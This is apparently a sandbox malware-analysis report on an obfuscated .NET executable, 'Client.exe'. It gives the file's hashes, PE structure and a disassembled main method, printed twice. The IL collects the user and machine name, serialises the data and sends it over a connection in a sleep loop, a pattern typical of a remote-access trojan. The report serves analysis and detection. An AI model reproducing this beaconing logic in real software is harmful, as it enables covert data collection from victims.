Suspicious
Suspect

c12b7577f69508831965d76c2ecdb840

PE Executable
|
MD5: c12b7577f69508831965d76c2ecdb840
|
Size: 494.59 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
c12b7577f69508831965d76c2ecdb840
Sha1
ddd636650d71f0be49bb28e51a53b29725608931
Sha256
263748ae9265e9f849e734991c1e48affdd629cb01644c3276ee14a4841b8f7d
Sha384
feb3bcbe46e557e428559873a72731885fcd0fb8368e4b9ae29a6280d41968d65e04fcd45605bec0d962c66540f43e69
Sha512
c7b254efd26c37372be586b959ac79407cf4b52befa98fe4f7c89683e43e41e276091548e9f4105936984738348444fe4d21299b7e3dc829dff50302c5deef12
SSDeep
12288:IImLF8RtLwxoLn4Yc/4jeHcYvAXM5Zqp:cGLw6J5yHcYv
TLSH
6BB429253FA5DE00D481297EC6BE3A49CB26E0F115026347370AF6A24D459EEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
c12b7577f69508831965d76c2ecdb840
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
95ikhcpcr0rw1a4li3g
kgzyj3vkvvy5bkp7qxwdgwbcej9
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void MAxGDXISsl.ayGfORFLhBUEKR::mXXwSuctVgGyyCt(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

624
Main Method

System.Void MAxGDXISsl.ayGfORFLhBUEKR::mXXwSuctVgGyyCt(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::bRlnxeJGCaIdaczYbA() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::vDxhSDGrOLSgQjCx() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::cKvhDbNCiwvyvqhMKJYdkSkqm() stloc V_3 nop <null> ldloc V_3 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::ujtstXfzwQEmsbkekHKtTUlU() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::vKouLLCuAVMcaCjrvGfbJoflZ() br IL_000E: nop call System.Void MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::vKouLLCuAVMcaCjrvGfbJoflZ() call System.Void GKVdHwJHFBAscTvFWNYldYpu.jPuQJENqFV::pIDhMRywAAEcsWUPGrIWbOms() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::PKWHsBvwTku call System.String MAxGDXISsl.sMBangLUaxdrNkB::rFzDdDWipoRhFPbcnhjcCZ() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::BadCtbnmpcgoy call System.Void uXavISjqxngy.rNNSfkBddvy::YOlxsMRQaXezdF() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::BadCtbnmpcgoy call System.Boolean iRMasRXuocJGQsBAdx.FuWyOblSSYJWO::JpIaRYORMl(System.String) brtrue IL_0080: call System.Void dOUDNRrhxp.eCMQOKzIzCn::cEjmzkmqGYMeZtkJ() leave IL_0283: ret call System.Void dOUDNRrhxp.eCMQOKzIzCn::cEjmzkmqGYMeZtkJ() call System.Void tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FZhyNqMVla() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldfld System.Boolean GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::UoncIgFtxvYUqpiWVRBRR brtrue IL_026E: call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::ooxDrGdtvXhKuHPWaIUCS call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::aeTPJaEvIgd() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qCYTvuQIXRwt() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hdgtbZyZlTs() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FtqaJjgjJyva ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::kmqzrjvHVuEmZ() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::aUMiIhaJbwYBhGejE() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::fIKHaIfiBlknYuTDzdNC() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LkbLubqCoclqV() ldelem System.String call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::RMTuDDagoYoX() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hdHBWBXUXjwghpgMJzx() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::nCqfjJzkev() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::VuuXOeyPreEnMOUkzuBrBWAv() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldloc V_1 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::WWwIYhbPoxm() ldelem System.String ldloc V_2 ldsfld System.Random tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FtqaJjgjJyva ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::OlwkatGSilOiNoxSFULAMKx(System.String,System.String) ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldfld System.Boolean GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::UoncIgFtxvYUqpiWVRBRR brfalse IL_026E: call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh newobj System.Void tdKDlWYJZNhIixzMCIwoPo.SCIWlyBokSWLyc::.ctor(GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar) stfld tdKDlWYJZNhIixzMCIwoPo.SCIWlyBokSWLyc GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::aiuieJWcQrUzjMloQtb ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh newobj System.Void uXavISjqxngy.OlyXpduhMxweeBUc::.ctor(GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar) stfld uXavISjqxngy.OlyXpduhMxweeBUc GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::YOukmlRIeLCWSpOEhZ ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::dXOWOuTfZrUrfmbRMCnpcgZJ() newarr System.Object dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hHfijIFBINIVnlqKQefBF() call System.String MAxGDXISsl.sMBangLUaxdrNkB::pWnFbCpGvAdYZnVJdyQdTUK() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::lFJDmKwRxxEmgmnwpi() call System.Byte[] tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::KWoViMaZECoygVLqLJRGDHJJ() stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qWZTvZQwfLCtIf() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::XUqfSfjjdORVuOvwGbbfDh stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::VaYgVvErQLR() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::AspZKWvfwTHEwyHEOy stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::EDWUowmOGM() call System.String System.Environment::get_UserName() call System.String MAxGDXISsl.sMBangLUaxdrNkB::EyoXAnJmSOJhpyu() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::NeVNRGvDwGcQNXJNTlfJH() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::rwLotVDXdG stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::YMtIrNwVQyJoKBAhnlU() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::yzsBKJrhfjIelyiSTv stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::VubmJwejSdaC() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::yXWpJTbfMYtNFJeQcMhbTETI stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::jGJUJOhGapeHZMHMmyu() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::pBVJlXBboT stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::AJdkGyuiNCnXGJbvqNdWnA() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::iSapKCkbhICcJjh stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::ExfkkWWgegNdZcYOLUytXCGA() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::KqUbTZGGZTyRcMLnyKLuTsZ stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::kMWZUXBAOYnaNK() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::jJfhodncjfUeun stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qWJrsgBSSySBo() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::lcnUureuFiixZLeTmdZ stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::XCqfVzKAGJIM() call System.String tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::oFoFmLAMOGZen() stelem.ref <null> call System.Byte[] wyMQOlyoiOOeHwlt.sAdZyIAWqSfOXYCVaTDADB::dIVxylqDohwoQ(System.Object[]) callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::FDnWImoPakTWjNqGBcSGSN(System.Byte[]) call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void MAxGDXISsl.ayGfORFLhBUEKR::mXXwSuctVgGyyCt(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

624
Main Method

System.Void MAxGDXISsl.ayGfORFLhBUEKR::mXXwSuctVgGyyCt(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::bRlnxeJGCaIdaczYbA() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::vDxhSDGrOLSgQjCx() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::cKvhDbNCiwvyvqhMKJYdkSkqm() stloc V_3 nop <null> ldloc V_3 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::ujtstXfzwQEmsbkekHKtTUlU() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::vKouLLCuAVMcaCjrvGfbJoflZ() br IL_000E: nop call System.Void MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::vKouLLCuAVMcaCjrvGfbJoflZ() call System.Void GKVdHwJHFBAscTvFWNYldYpu.jPuQJENqFV::pIDhMRywAAEcsWUPGrIWbOms() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::PKWHsBvwTku call System.String MAxGDXISsl.sMBangLUaxdrNkB::rFzDdDWipoRhFPbcnhjcCZ() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::BadCtbnmpcgoy call System.Void uXavISjqxngy.rNNSfkBddvy::YOlxsMRQaXezdF() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::BadCtbnmpcgoy call System.Boolean iRMasRXuocJGQsBAdx.FuWyOblSSYJWO::JpIaRYORMl(System.String) brtrue IL_0080: call System.Void dOUDNRrhxp.eCMQOKzIzCn::cEjmzkmqGYMeZtkJ() leave IL_0283: ret call System.Void dOUDNRrhxp.eCMQOKzIzCn::cEjmzkmqGYMeZtkJ() call System.Void tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FZhyNqMVla() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldfld System.Boolean GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::UoncIgFtxvYUqpiWVRBRR brtrue IL_026E: call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::ooxDrGdtvXhKuHPWaIUCS call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::aeTPJaEvIgd() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qCYTvuQIXRwt() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hdgtbZyZlTs() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FtqaJjgjJyva ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::kmqzrjvHVuEmZ() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::aUMiIhaJbwYBhGejE() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::fIKHaIfiBlknYuTDzdNC() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LkbLubqCoclqV() ldelem System.String call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::RMTuDDagoYoX() newarr System.Char dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hdHBWBXUXjwghpgMJzx() call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::nCqfjJzkev() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::VuuXOeyPreEnMOUkzuBrBWAv() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldloc V_1 call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::WWwIYhbPoxm() ldelem System.String ldloc V_2 ldsfld System.Random tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::FtqaJjgjJyva ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::OlwkatGSilOiNoxSFULAMKx(System.String,System.String) ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldfld System.Boolean GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::UoncIgFtxvYUqpiWVRBRR brfalse IL_026E: call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh newobj System.Void tdKDlWYJZNhIixzMCIwoPo.SCIWlyBokSWLyc::.ctor(GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar) stfld tdKDlWYJZNhIixzMCIwoPo.SCIWlyBokSWLyc GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::aiuieJWcQrUzjMloQtb ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh newobj System.Void uXavISjqxngy.OlyXpduhMxweeBUc::.ctor(GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar) stfld uXavISjqxngy.OlyXpduhMxweeBUc GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::YOukmlRIeLCWSpOEhZ ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::dXOWOuTfZrUrfmbRMCnpcgZJ() newarr System.Object dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::hHfijIFBINIVnlqKQefBF() call System.String MAxGDXISsl.sMBangLUaxdrNkB::pWnFbCpGvAdYZnVJdyQdTUK() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::lFJDmKwRxxEmgmnwpi() call System.Byte[] tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::KWoViMaZECoygVLqLJRGDHJJ() stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qWZTvZQwfLCtIf() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::XUqfSfjjdORVuOvwGbbfDh stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::VaYgVvErQLR() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::AspZKWvfwTHEwyHEOy stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::EDWUowmOGM() call System.String System.Environment::get_UserName() call System.String MAxGDXISsl.sMBangLUaxdrNkB::EyoXAnJmSOJhpyu() call System.String yKKAzBtcdP.vVdVeLkUZclXrRvbTTaeWTBQA::nduOfDbbAbgGvwjysXNmTiDaa(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::NeVNRGvDwGcQNXJNTlfJH() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::rwLotVDXdG stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::YMtIrNwVQyJoKBAhnlU() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::yzsBKJrhfjIelyiSTv stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::VubmJwejSdaC() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::yXWpJTbfMYtNFJeQcMhbTETI stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::jGJUJOhGapeHZMHMmyu() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::pBVJlXBboT stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::AJdkGyuiNCnXGJbvqNdWnA() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::iSapKCkbhICcJjh stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::ExfkkWWgegNdZcYOLUytXCGA() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::KqUbTZGGZTyRcMLnyKLuTsZ stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::kMWZUXBAOYnaNK() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::jJfhodncjfUeun stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::qWJrsgBSSySBo() ldsfld System.String MAxGDXISsl.sKfpKdZzETWOaKxFiigMMIAz::lcnUureuFiixZLeTmdZ stelem.ref <null> dup <null> call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::XCqfVzKAGJIM() call System.String tdKDlWYJZNhIixzMCIwoPo.aaceJzIwEvLfsKJfJKwW::oFoFmLAMOGZen() stelem.ref <null> call System.Byte[] wyMQOlyoiOOeHwlt.sAdZyIAWqSfOXYCVaTDADB::dIVxylqDohwoQ(System.Object[]) callvirt System.Void GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar::FDnWImoPakTWjNqGBcSGSN(System.Byte[]) call System.Int32 MAxGDXISsl.sMBangLUaxdrNkB::LEkoxKmCAtPHijtDaC() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld GKVdHwJHFBAscTvFWNYldYpu.UCJTPszJEHjUgjTar MAxGDXISsl.ayGfORFLhBUEKR::XaqGnrfuEvtyvkypeTTJMRh pop <null> leave IL_0283: ret ret <null>
c12b7577f69508831965d76c2ecdb840 (494.59 KB)
File Structure
c12b7577f69508831965d76c2ecdb840
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
95ikhcpcr0rw1a4li3g
kgzyj3vkvvy5bkp7qxwdgwbcej9
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙